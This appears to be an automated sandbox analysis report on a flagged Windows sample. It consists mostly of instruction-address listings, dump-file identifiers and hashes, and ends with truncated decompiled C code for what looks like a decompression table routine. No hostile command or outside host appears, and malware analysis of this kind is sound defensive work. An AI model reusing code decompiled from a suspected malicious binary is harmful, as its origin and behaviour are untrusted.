                                                                                        0x004071ec
                                                                                        0x004071ee
                                                                                        0x004071f1
                                                                                        0x004071f4
                                                                                        0x0040720e
                                                                                        0x0040720e
                                                                                        0x00407211
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407217
                                                                                        0x00407217
                                                                                        0x0040721a
                                                                                        0x00407221
                                                                                        0x00000000
                                                                                        0x00407221
                                                                                        0x004071f6
                                                                                        0x004071f9
                                                                                        0x00407200
                                                                                        0x00407203
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407229
                                                                                        0x00407229
                                                                                        0x0040724e
                                                                                        0x0040724e
                                                                                        0x0040724e
                                                                                        0x00407250
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040722e
                                                                                        0x0040722e
                                                                                        0x00407232
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407238
                                                                                        0x00407238
                                                                                        0x0040723b
                                                                                        0x0040723e
                                                                                        0x00407241
                                                                                        0x00407243
                                                                                        0x00407245
                                                                                        0x00407248
                                                                                        0x0040724b
                                                                                        0x0040724b
                                                                                        0x0040724b
                                                                                        0x00407252
                                                                                        0x0040725a
                                                                                        0x0040725d
                                                                                        0x00407260
                                                                                        0x00407262
                                                                                        0x00407265
                                                                                        0x00407265
                                                                                        0x00407267
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040726d
                                                                                        0x0040726d
                                                                                        0x00407270
                                                                                        0x00407275
                                                                                        0x00407277
                                                                                        0x0040727d
                                                                                        0x0040727f
                                                                                        0x00407294
                                                                                        0x00407296
                                                                                        0x00407296
                                                                                        0x00407281
                                                                                        0x00407287
                                                                                        0x00407289
                                                                                        0x0040728b
                                                                                        0x0040728b
                                                                                        0x00407298
                                                                                        0x0040729c
                                                                                        0x0040729f
                                                                                        0x004072a5
                                                                                        0x004072a5
                                                                                        0x004072a8
                                                                                        0x004072a8
                                                                                        0x004072a8
                                                                                        0x004072aa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004072b0
                                                                                        0x004072b0
                                                                                        0x004072b6
                                                                                        0x004072b8
                                                                                        0x004072dd
                                                                                        0x004072e0
                                                                                        0x004072e6
                                                                                        0x004072eb
                                                                                        0x004072f1
                                                                                        0x004072f7
                                                                                        0x004072f9
                                                                                        0x004072fc
                                                                                        0x00407305
                                                                                        0x0040730b
                                                                                        0x0040730b
                                                                                        0x004072fe
                                                                                        0x00407300
                                                                                        0x00407302
                                                                                        0x00407302
                                                                                        0x0040730d
                                                                                        0x00407313
                                                                                        0x00407315
                                                                                        0x00407318
                                                                                        0x0040731a
                                                                                        0x00407320
                                                                                        0x00407322
                                                                                        0x00407324
                                                                                        0x00407326
                                                                                        0x00407328
                                                                                        0x0040732b
                                                                                        0x00407334
                                                                                        0x00407337
                                                                                        0x00407337
                                                                                        0x0040732d
                                                                                        0x0040732d
                                                                                        0x00407330
                                                                                        0x00407330
                                                                                        0x0040732b
                                                                                        0x00407322
                                                                                        0x00407339
                                                                                        0x0040733b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040733b
                                                                                        0x004072ba
                                                                                        0x004072ba
                                                                                        0x004072c0
                                                                                        0x004072c6
                                                                                        0x004072c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004072ca
                                                                                        0x004072ca
                                                                                        0x004072cc
                                                                                        0x004072ce
                                                                                        0x004072d7
                                                                                        0x004072d7
                                                                                        0x004072d0
                                                                                        0x004072d0
                                                                                        0x004072d3
                                                                                        0x004072d3
                                                                                        0x004072d9
                                                                                        0x004072db
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407341
                                                                                        0x00407341
                                                                                        0x00407346
                                                                                        0x00407348
                                                                                        0x00407349
                                                                                        0x0040734a
                                                                                        0x0040734b
                                                                                        0x00407351
                                                                                        0x00407354
                                                                                        0x00407357
                                                                                        0x0040735a
                                                                                        0x0040735c
                                                                                        0x00407362
                                                                                        0x00407362
                                                                                        0x00407365
                                                                                        0x00407365
                                                                                        0x00407365
                                                                                        0x00407365
                                                                                        0x0040736e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407373
                                                                                        0x00407373
                                                                                        0x00407376
                                                                                        0x00407379
                                                                                        0x0040737b
                                                                                        0x00407412
                                                                                        0x00407412
                                                                                        0x00407415
                                                                                        0x00407417
                                                                                        0x00407418
                                                                                        0x00407419
                                                                                        0x0040741c
                                                                                        0x00000000
                                                                                        0x0040741c
                                                                                        0x00407381
                                                                                        0x00407381
                                                                                        0x00407387
                                                                                        0x00407389
                                                                                        0x004073ae
                                                                                        0x004073b1
                                                                                        0x004073b7
                                                                                        0x004073bc
                                                                                        0x004073c2
                                                                                        0x004073c8
                                                                                        0x004073ca
                                                                                        0x004073cd
                                                                                        0x004073d6
                                                                                        0x004073dc
                                                                                        0x004073dc
                                                                                        0x004073cf
                                                                                        0x004073d1
                                                                                        0x004073d3
                                                                                        0x004073d3
                                                                                        0x004073de
                                                                                        0x004073e4
                                                                                        0x004073e6
                                                                                        0x004073e9
                                                                                        0x004073eb
                                                                                        0x004073f1
                                                                                        0x004073f3
                                                                                        0x004073f5
                                                                                        0x004073f7
                                                                                        0x004073f9
                                                                                        0x004073fc
                                                                                        0x00407405
                                                                                        0x00407408
                                                                                        0x00407408
                                                                                        0x004073fe
                                                                                        0x004073fe
                                                                                        0x00407401
                                                                                        0x00407401
                                                                                        0x004073fc
                                                                                        0x004073f3
                                                                                        0x0040740a
                                                                                        0x0040740c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040740c
                                                                                        0x0040738b
                                                                                        0x0040738b
                                                                                        0x00407391
                                                                                        0x00407397
                                                                                        0x00407399
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040739b
                                                                                        0x0040739b
                                                                                        0x0040739d
                                                                                        0x0040739f
                                                                                        0x004073a6
                                                                                        0x004073a6
                                                                                        0x004073a8
                                                                                        0x004073a1
                                                                                        0x004073a1
                                                                                        0x004073a3
                                                                                        0x004073a3
                                                                                        0x004073aa
                                                                                        0x004073ac
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407424
                                                                                        0x00407424
                                                                                        0x00407427
                                                                                        0x00407429
                                                                                        0x0040742c
                                                                                        0x0040742f
                                                                                        0x0040742f
                                                                                        0x0040742f
                                                                                        0x0040742f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406add
                                                                                        0x00406ac1
                                                                                        0x00000000
                                                                                        0x00406ac7
                                                                                        0x00406aca
                                                                                        0x00406ad4
                                                                                        0x00406ad7
                                                                                        0x00406ada
                                                                                        0x00000000
                                                                                        0x00406ada
                                                                                        0x00406ac1
                                                                                        0x00406ae5
                                                                                        0x00406ae8
                                                                                        0x00406aec
                                                                                        0x00406af6
                                                                                        0x00406b00
                                                                                        0x00406b03
                                                                                        0x00406b09
                                                                                        0x00406c3d
                                                                                        0x00406c3f
                                                                                        0x00406c45
                                                                                        0x00406c48
                                                                                        0x00406c4b
                                                                                        0x00000000
                                                                                        0x00406c4b
                                                                                        0x00406b0f
                                                                                        0x00406b0f
                                                                                        0x00406b10
                                                                                        0x00406b68
                                                                                        0x00406b68
                                                                                        0x00406b6f
                                                                                        0x00406c15
                                                                                        0x00406c15
                                                                                        0x00406c1a
                                                                                        0x00406c1d
                                                                                        0x00406c22
                                                                                        0x00406c25
                                                                                        0x00406c2a
                                                                                        0x00406c2d
                                                                                        0x00406c32
                                                                                        0x00406c35
                                                                                        0x00406c35
                                                                                        0x00000000
                                                                                        0x00406b75
                                                                                        0x00406b75
                                                                                        0x00406b75
                                                                                        0x00406b75
                                                                                        0x00406b79
                                                                                        0x00406b79
                                                                                        0x00406b9b
                                                                                        0x00406b9e
                                                                                        0x00406ba0
                                                                                        0x00406ba3
                                                                                        0x00406ba8
                                                                                        0x00406b7e
                                                                                        0x00406b7e
                                                                                        0x00406b83
                                                                                        0x00406b85
                                                                                        0x00406b87
                                                                                        0x00406b8c
                                                                                        0x00406b92
                                                                                        0x00406b97
                                                                                        0x00406b99
                                                                                        0x00406b99
                                                                                        0x00406b8e
                                                                                        0x00406b8e
                                                                                        0x00406b8e
                                                                                        0x00406b8c
                                                                                        0x00000000
                                                                                        0x00406baa
                                                                                        0x00406bd7
                                                                                        0x00406bdc
                                                                                        0x00406bde
                                                                                        0x00406bdf
                                                                                        0x00406be1
                                                                                        0x00406be2
                                                                                        0x00406be2
                                                                                        0x00406be2
                                                                                        0x00406c0a
                                                                                        0x00406c0f
                                                                                        0x00406c0f
                                                                                        0x00000000
                                                                                        0x00406c0f
                                                                                        0x00406ba8
                                                                                        0x00406b6f
                                                                                        0x00406b12
                                                                                        0x00406b12
                                                                                        0x00406b13
                                                                                        0x00406b5d
                                                                                        0x00000000
                                                                                        0x00406b5d
                                                                                        0x00406b15
                                                                                        0x00406b16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406c72
                                                                                        0x00406c72
                                                                                        0x00406c72
                                                                                        0x00406c75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406c52
                                                                                        0x00406c52
                                                                                        0x00406c56
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406c5c
                                                                                        0x00406c5c
                                                                                        0x00406c5f
                                                                                        0x00406c62
                                                                                        0x00406c67
                                                                                        0x00406c69
                                                                                        0x00406c6c
                                                                                        0x00406c6f
                                                                                        0x00406c6f
                                                                                        0x00406c6f
                                                                                        0x00406c77
                                                                                        0x00406c77
                                                                                        0x00406c7a
                                                                                        0x00406c7c
                                                                                        0x00406c81
                                                                                        0x00406c84
                                                                                        0x00406c86
                                                                                        0x00406c89
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406c8f
                                                                                        0x00406c8f
                                                                                        0x00406c91
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406c97
                                                                                        0x00406c97
                                                                                        0x00406c9b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ca1
                                                                                        0x00406ca1
                                                                                        0x00406ca4
                                                                                        0x00406ca6
                                                                                        0x00406d44
                                                                                        0x00406d44
                                                                                        0x00406d47
                                                                                        0x00406d49
                                                                                        0x00406d49
                                                                                        0x00406d4c
                                                                                        0x00406d4f
                                                                                        0x00406d51
                                                                                        0x00406d53
                                                                                        0x00406d55
                                                                                        0x00406d55
                                                                                        0x00406d5e
                                                                                        0x00406d63
                                                                                        0x00406d66
                                                                                        0x00406d69
                                                                                        0x00406d6c
                                                                                        0x00406d6f
                                                                                        0x00406d6f
                                                                                        0x00406d6f
                                                                                        0x00406d72
                                                                                        0x00406d78
                                                                                        0x00406d78
                                                                                        0x00406d7e
                                                                                        0x00406d7e
                                                                                        0x00406d7e
                                                                                        0x00000000
                                                                                        0x00406d72
                                                                                        0x00406cac
                                                                                        0x00406cac
                                                                                        0x00406cb2
                                                                                        0x00406cb5
                                                                                        0x00406cb7
                                                                                        0x00406ce2
                                                                                        0x00406ce5
                                                                                        0x00406ceb
                                                                                        0x00406cf0
                                                                                        0x00406cf6
                                                                                        0x00406cfc
                                                                                        0x00406cfe
                                                                                        0x00406d01
                                                                                        0x00406d0a
                                                                                        0x00406d10
                                                                                        0x00406d10
                                                                                        0x00406d03
                                                                                        0x00406d05
                                                                                        0x00406d07
                                                                                        0x00406d07
                                                                                        0x00406d12
                                                                                        0x00406d18
                                                                                        0x00406d1b
                                                                                        0x00406d1d
                                                                                        0x00406d1f
                                                                                        0x00406d25
                                                                                        0x00406d27
                                                                                        0x00406d29
                                                                                        0x00406d2c
                                                                                        0x00406d35
                                                                                        0x00406d35
                                                                                        0x00406d37
                                                                                        0x00406d2e
                                                                                        0x00406d2e
                                                                                        0x00406d31
                                                                                        0x00406d31
                                                                                        0x00406d39
                                                                                        0x00406d39
                                                                                        0x00406d27
                                                                                        0x00406d3c
                                                                                        0x00406d3e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406d3e
                                                                                        0x00406cb9
                                                                                        0x00406cb9
                                                                                        0x00406cbf
                                                                                        0x00406cc5
                                                                                        0x00406cc7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406cc9
                                                                                        0x00406cc9
                                                                                        0x00406ccb
                                                                                        0x00406ccd
                                                                                        0x00406cd0
                                                                                        0x00406cd7
                                                                                        0x00406cd7
                                                                                        0x00406cd9
                                                                                        0x00406cd2
                                                                                        0x00406cd2
                                                                                        0x00406cd4
                                                                                        0x00406cd4
                                                                                        0x00406cdb
                                                                                        0x00406cdd
                                                                                        0x00406ce0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406de4
                                                                                        0x00406de7
                                                                                        0x00406dea
                                                                                        0x00406df0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406fc7
                                                                                        0x00406fc7
                                                                                        0x00406fc7
                                                                                        0x00406fca
                                                                                        0x00406fcd
                                                                                        0x00406fcf
                                                                                        0x00406fd2
                                                                                        0x00406fd8
                                                                                        0x00406fdf
                                                                                        0x00406fe1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406eb5
                                                                                        0x00406eb5
                                                                                        0x00406edd
                                                                                        0x00406edd
                                                                                        0x00406edd
                                                                                        0x00406edf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ebd
                                                                                        0x00406ebd
                                                                                        0x00406ec1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ec7
                                                                                        0x00406ec7
                                                                                        0x00406eca
                                                                                        0x00406ecd
                                                                                        0x00406ed0
                                                                                        0x00406ed2
                                                                                        0x00406ed4
                                                                                        0x00406ed7
                                                                                        0x00406eda
                                                                                        0x00406eda
                                                                                        0x00406eda
                                                                                        0x00406ee1
                                                                                        0x00406ee1
                                                                                        0x00406ee9
                                                                                        0x00406eec
                                                                                        0x00406ef2
                                                                                        0x00406ef5
                                                                                        0x00406ef9
                                                                                        0x00406efd
                                                                                        0x00406f00
                                                                                        0x00406f03
                                                                                        0x00406f1b
                                                                                        0x00406f1b
                                                                                        0x00406f1e
                                                                                        0x00406f2c
                                                                                        0x00406f2f
                                                                                        0x00406f20
                                                                                        0x00406f20
                                                                                        0x00406f22
                                                                                        0x00406f29
                                                                                        0x00406f29
                                                                                        0x00406f58
                                                                                        0x00406f58
                                                                                        0x00406f58
                                                                                        0x00406f5b
                                                                                        0x00406f5d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f38
                                                                                        0x00406f38
                                                                                        0x00406f3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f42
                                                                                        0x00406f42
                                                                                        0x00406f45
                                                                                        0x00406f48
                                                                                        0x00406f4b
                                                                                        0x00406f4d
                                                                                        0x00406f4f
                                                                                        0x00406f52
                                                                                        0x00406f55
                                                                                        0x00406f55
                                                                                        0x00406f55
                                                                                        0x00406f5f
                                                                                        0x00406f5f
                                                                                        0x00406f61
                                                                                        0x00406f63
                                                                                        0x00406f6e
                                                                                        0x00406f71
                                                                                        0x00406f74
                                                                                        0x00406f76
                                                                                        0x00406f78
                                                                                        0x00406f7a
                                                                                        0x00406f7d
                                                                                        0x00406f80
                                                                                        0x00406f85
                                                                                        0x00406f88
                                                                                        0x00406f8b
                                                                                        0x00406f8e
                                                                                        0x00406f95
                                                                                        0x00406f98
                                                                                        0x00406f9a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406fa0
                                                                                        0x00406fa0
                                                                                        0x00406fa4
                                                                                        0x00406fb5
                                                                                        0x00406fb5
                                                                                        0x00406fb5
                                                                                        0x00406fb7
                                                                                        0x00406fb7
                                                                                        0x00406fbb
                                                                                        0x00406fbb
                                                                                        0x00406fbb
                                                                                        0x00406fbd
                                                                                        0x00406fbe
                                                                                        0x00406fc1
                                                                                        0x00406fc1
                                                                                        0x00406fc1
                                                                                        0x00406fc4
                                                                                        0x00000000
                                                                                        0x00406fc4
                                                                                        0x00406fa6
                                                                                        0x00406fa6
                                                                                        0x00406fa9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406faf
                                                                                        0x00406faf
                                                                                        0x00000000
                                                                                        0x00406faf
                                                                                        0x00406f05
                                                                                        0x00406f05
                                                                                        0x00406f07
                                                                                        0x00406f09
                                                                                        0x00406f0c
                                                                                        0x00406f0f
                                                                                        0x00406f13
                                                                                        0x00406f13
                                                                                        0x00406fe7
                                                                                        0x00406fe7
                                                                                        0x00406fea
                                                                                        0x00406ff1
                                                                                        0x00406ff5
                                                                                        0x00406ff7
                                                                                        0x00406ffa
                                                                                        0x00406ffd
                                                                                        0x00407002
                                                                                        0x00407005
                                                                                        0x00407007
                                                                                        0x00407008
                                                                                        0x0040700b
                                                                                        0x00407016
                                                                                        0x00407019
                                                                                        0x00407030
                                                                                        0x00407035
                                                                                        0x0040703c
                                                                                        0x00407041
                                                                                        0x00407045
                                                                                        0x00407047
                                                                                        0x00407047
                                                                                        0x00407047
                                                                                        0x0040704a
                                                                                        0x0040704c
                                                                                        0x00000000
                                                                                        0x00407052
                                                                                        0x00407052
                                                                                        0x00407056
                                                                                        0x00407061
                                                                                        0x00407074
                                                                                        0x00407079
                                                                                        0x0040707e
                                                                                        0x00407080
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407086
                                                                                        0x00407086
                                                                                        0x00407089
                                                                                        0x0040708b
                                                                                        0x00407099
                                                                                        0x00407099
                                                                                        0x0040709c
                                                                                        0x0040709c
                                                                                        0x0040709f
                                                                                        0x004070a2
                                                                                        0x004070a5
                                                                                        0x004070a8
                                                                                        0x004070ab
                                                                                        0x004070ae
                                                                                        0x00000000
                                                                                        0x004070ae
                                                                                        0x0040708d
                                                                                        0x0040708d
                                                                                        0x00407093
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407093
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407432
                                                                                        0x00407432
                                                                                        0x00407438
                                                                                        0x0040743e
                                                                                        0x00407443
                                                                                        0x00407449
                                                                                        0x0040744f
                                                                                        0x00407451
                                                                                        0x00407454
                                                                                        0x0040745d
                                                                                        0x00407463
                                                                                        0x00407463
                                                                                        0x00407456
                                                                                        0x00407458
                                                                                        0x0040745a
                                                                                        0x0040745a
                                                                                        0x00407465
                                                                                        0x00407467
                                                                                        0x0040746a
                                                                                        0x004074a5
                                                                                        0x004074a5
                                                                                        0x00000000
                                                                                        0x0040746c
                                                                                        0x0040746c
                                                                                        0x0040746c
                                                                                        0x00407472
                                                                                        0x00407475
                                                                                        0x00407477
                                                                                        0x004074ac
                                                                                        0x004074ae
                                                                                        0x00000000
                                                                                        0x004074ae
                                                                                        0x00000000
                                                                                        0x00407477
                                                                                        0x00000000
                                                                                        0x00406ab6
                                                                                        0x00407484
                                                                                        0x00000000
                                                                                        0x00407484
                                                                                        0x00406e98
                                                                                        0x00406e9a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e9c
                                                                                        0x00406e9c
                                                                                        0x00406e9f
                                                                                        0x00000000
                                                                                        0x00406e9f
                                                                                        0x00406de4
                                                                                        0x00406da5
                                                                                        0x00407489
                                                                                        0x0040748c
                                                                                        0x0040748e
                                                                                        0x00407497
                                                                                        0x0040749d
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                        • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                        • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                        • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                        				signed int _v8;
                                                                                        				unsigned int _v12;
                                                                                        				signed int _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				intOrPtr* _v32;
                                                                                        				signed int* _v36;
                                                                                        				signed int _v40;
                                                                                        				signed int _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				void _v116;
                                                                                        				signed int _v176;
                                                                                        				signed int _v180;
                                                                                        				signed int _v240;
                                                                                        				signed int _t166;
                                                                                        				signed int _t168;
                                                                                        				intOrPtr _t175;
                                                                                        				signed int _t181;
                                                                                        				void* _t182;
                                                                                        				intOrPtr _t183;
                                                                                        				signed int* _t184;
                                                                                        				signed int _t186;
                                                                                        				signed int _t187;
                                                                                        				signed int* _t189;
                                                                                        				signed int _t190;
                                                                                        				intOrPtr* _t191;
                                                                                        				intOrPtr _t192;
                                                                                        				signed int _t193;
                                                                                        				signed int _t195;
                                                                                        				signed int _t200;
                                                                                        				signed int _t205;
                                                                                        				void* _t207;
                                                                                        				short _t208;
                                                                                        				signed char _t222;
                                                                                        				signed int _t224;
                                                                                        				signed int _t225;
                                                                                        				signed int* _t232;
                                                                                        				signed int _t233;
                                                                                        				signed int _t234;
                                                                                        				void* _t235;
                                                                                        				signed int _t236;
                                                                                        				signed int _t244;
                                                                                        				signed int _t246;
                                                                                        				signed int _t251;
                                                                                        				signed int _t254;
                                                                                        				signed int _t256;
                                                                                        				signed int _t259;
                                                                                        				signed int _t262;
                                                                                        				void* _t263;
                                                                                        				void* _t264;
                                                                                        				signed int _t267;
                                                                                        				intOrPtr _t269;
                                                                                        				intOrPtr _t271;
                                                                                        				signed int _t274;
                                                                                        				intOrPtr* _t275;
                                                                                        				unsigned int _t276;
                                                                                        				void* _t277;
                                                                                        				signed int _t278;
                                                                                        				intOrPtr* _t279;
                                                                                        				signed int _t281;
                                                                                        				intOrPtr _t282;
                                                                                        				intOrPtr _t283;
                                                                                        				signed int* _t284;
                                                                                        				signed int _t286;
                                                                                        				signed int _t287;
                                                                                        				signed int _t288;
                                                                                        				signed int _t296;
                                                                                        				signed int* _t297;
                                                                                        				intOrPtr _t298;
                                                                                        				void* _t299;
                                                                                        
                                                                                        				_t278 = _a8;
                                                                                        				_t187 = 0x10;
                                                                                        				memset( &_v116, 0, _t187 << 2);
                                                                                        				_t189 = _a4;
                                                                                        				_t233 = _t278;
                                                                                        				do {
                                                                                        					_t166 =  *_t189;
                                                                                        					_t189 =  &(_t189[1]);
                                                                                        					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                        					_t233 = _t233 - 1;
                                                                                        				} while (_t233 != 0);
                                                                                        				if(_v116 != _t278) {
                                                                                        					_t279 = _a28;
                                                                                        					_t267 =  *_t279;
                                                                                        					_t190 = 1;
                                                                                        					_a28 = _t267;
                                                                                        					_t234 = 0xf;
                                                                                        					while(1) {
                                                                                        						_t168 = 0;
                                                                                        						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_t190 = _t190 + 1;
                                                                                        						if(_t190 <= _t234) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						break;
                                                                                        					}
                                                                                        					_v8 = _t190;
                                                                                        					if(_t267 < _t190) {
                                                                                        						_a28 = _t190;
                                                                                        					}
                                                                                        					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                        						_t234 = _t234 - 1;
                                                                                        						if(_t234 != 0) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						break;
                                                                                        					}
                                                                                        					_v28 = _t234;
                                                                                        					if(_a28 > _t234) {
                                                                                        						_a28 = _t234;
                                                                                        					}
                                                                                        					 *_t279 = _a28;
                                                                                        					_t181 = 1 << _t190;
                                                                                        					while(_t190 < _t234) {
                                                                                        						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                        						if(_t182 < 0) {
                                                                                        							L64:
                                                                                        							return _t168 | 0xffffffff;
                                                                                        						}
                                                                                        						_t190 = _t190 + 1;
                                                                                        						_t181 = _t182 + _t182;
                                                                                        					}
                                                                                        					_t281 = _t234 << 2;
                                                                                        					_t191 = _t299 + _t281 - 0x70;
                                                                                        					_t269 =  *_t191;
                                                                                        					_t183 = _t181 - _t269;
                                                                                        					_v52 = _t183;
                                                                                        					if(_t183 < 0) {
                                                                                        						goto L64;
                                                                                        					}
                                                                                        					_v176 = _t168;
                                                                                        					 *_t191 = _t269 + _t183;
                                                                                        					_t192 = 0;
                                                                                        					_t235 = _t234 - 1;
                                                                                        					if(_t235 == 0) {
                                                                                        						L21:
                                                                                        						_t184 = _a4;
                                                                                        						_t271 = 0;
                                                                                        						do {
                                                                                        							_t193 =  *_t184;
                                                                                        							_t184 =  &(_t184[1]);
                                                                                        							if(_t193 != _t168) {
                                                                                        								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                        								_t236 =  *_t232;
                                                                                        								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                                        								 *_t232 = _t236 + 1;
                                                                                        							}
                                                                                        							_t271 = _t271 + 1;
                                                                                        						} while (_t271 < _a8);
                                                                                        						_v16 = _v16 | 0xffffffff;
                                                                                        						_v40 = _v40 & 0x00000000;
                                                                                        						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                        						_t195 = _v8;
                                                                                        						_t186 =  ~_a28;
                                                                                        						_v12 = _t168;
                                                                                        						_v180 = _t168;
                                                                                        						_v36 = 0x432190;
                                                                                        						_v240 = _t168;
                                                                                        						if(_t195 > _v28) {
                                                                                        							L62:
                                                                                        							_t168 = 0;
                                                                                        							if(_v52 == 0 || _v28 == 1) {
                                                                                        								return _t168;
                                                                                        							} else {
                                                                                        								goto L64;
                                                                                        							}
                                                                                        						}
                                                                                        						_v44 = _t195 - 1;
                                                                                        						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                        						do {
                                                                                        							_t282 =  *_v32;
                                                                                        							if(_t282 == 0) {
                                                                                        								goto L61;
                                                                                        							}
                                                                                        							while(1) {
                                                                                        								_t283 = _t282 - 1;
                                                                                        								_t200 = _a28 + _t186;
                                                                                        								_v48 = _t283;
                                                                                        								_v24 = _t200;
                                                                                        								if(_v8 <= _t200) {
                                                                                        									goto L45;
                                                                                        								}
                                                                                        								L31:
                                                                                        								_v20 = _t283 + 1;
                                                                                        								do {
                                                                                        									_v16 = _v16 + 1;
                                                                                        									_t296 = _v28 - _v24;
                                                                                        									if(_t296 > _a28) {
                                                                                        										_t296 = _a28;
                                                                                        									}
                                                                                        									_t222 = _v8 - _v24;
                                                                                        									_t254 = 1 << _t222;
                                                                                        									if(1 <= _v20) {
                                                                                        										L40:
                                                                                        										_t256 =  *_a36;
                                                                                        										_t168 = 1 << _t222;
                                                                                        										_v40 = 1;
                                                                                        										_t274 = _t256 + 1;
                                                                                        										if(_t274 > 0x5a0) {
                                                                                        											goto L64;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t275 = _v32;
                                                                                        										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                        										if(_t222 >= _t296) {
                                                                                        											goto L40;
                                                                                        										}
                                                                                        										while(1) {
                                                                                        											_t222 = _t222 + 1;
                                                                                        											if(_t222 >= _t296) {
                                                                                        												goto L40;
                                                                                        											}
                                                                                        											_t275 = _t275 + 4;
                                                                                        											_t264 = _t263 + _t263;
                                                                                        											_t175 =  *_t275;
                                                                                        											if(_t264 <= _t175) {
                                                                                        												goto L40;
                                                                                        											}
                                                                                        											_t263 = _t264 - _t175;
                                                                                        										}
                                                                                        										goto L40;
                                                                                        									}
                                                                                        									_t168 = _a32 + _t256 * 4;
